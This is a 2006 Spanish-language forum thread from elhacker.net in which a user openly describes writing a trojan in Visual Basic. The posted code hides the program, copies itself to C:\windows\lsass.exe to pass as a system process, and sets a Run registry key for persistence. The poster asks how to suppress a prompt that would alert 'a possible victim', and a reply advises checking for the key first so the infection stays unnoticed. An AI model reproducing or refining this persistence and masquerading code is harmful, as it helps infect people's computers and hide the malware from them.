elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Los 10 CVE más críticos (peligrosos) de 2020


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Problema: el registro me pide confirmación =(
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Problema: el registro me pide confirmación =(  (Leído 1,402 veces)
~~
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.981


Ver Perfil WWW
Problema: el registro me pide confirmación =(
« en: 29 Junio 2006, 01:03 am »

Hola a tod@s:

Weno de una vez por todas me he decidido a programar mi primer troyano en VB  ;D. Ya lo tengo
practicamente acabado, pero se me ha presentado un problemilla al modificar el registro.
Este es un trozo del codigo, el q lo añade al registro:

Código:
Private Sub Timer2_Timer()
On Error Resume Next
App.TaskVisible = False ' Lo hace invisible
Shell txt.Text 'Añade al registro
FileCopy App.Path & "\" & App.EXEName & ".exe", "C:\windows\lsass.exe" ' Lo copia
Timer2.Enabled = False
End Sub

txt es el nombre que le he dado a un cuadro de texto q contiene lo siguiente:

Código:
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v WinTray /t REG_SZ /d "C:\windows\lsass.exe"

Hasta aqui todo me funciona perfectamente, el problema se me plantea cuando reinicio mi Pc, pues
me sale una ventana de MS-DOS diciendome q la clave WinTray ya existe y que si quiero sustituirla,
lo cual llama un poco la atención de cara a infectar una posible víctima.

A alguien se le ocurre alguna idea para arreglar esto?????

Desde ya muxas gracias y 1 saludo


En línea

NYlOn


Desconectado Desconectado

Mensajes: 842


OOOOHHHHHH, TARAGÜIIII xDDDDDD


Ver Perfil WWW
Re: Problema: el registro me pide confirmación =(
« Respuesta #1 en: 29 Junio 2006, 01:36 am »

Antes de escribir checkea si el valor ya existe...


En línea

~~
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.981


Ver Perfil WWW
Re: Problema: el registro me pide confirmación =(
« Respuesta #2 en: 29 Junio 2006, 20:59 pm »

Ok

Muxas gracias por la idea NYlOn. Ahora ya he buscado como comprovar la clave y me funciona perfectamente.

1 saludo  ;D
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
gmail pide confirmacion por celular
Mensajería
ryan parker 4 7,057 Último mensaje 2 Marzo 2011, 03:08 am
por ryan parker
Problema con confirmación de registro
Desarrollo Web
janisorna 1 1,721 Último mensaje 28 Agosto 2013, 15:56 pm
por #!drvy
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines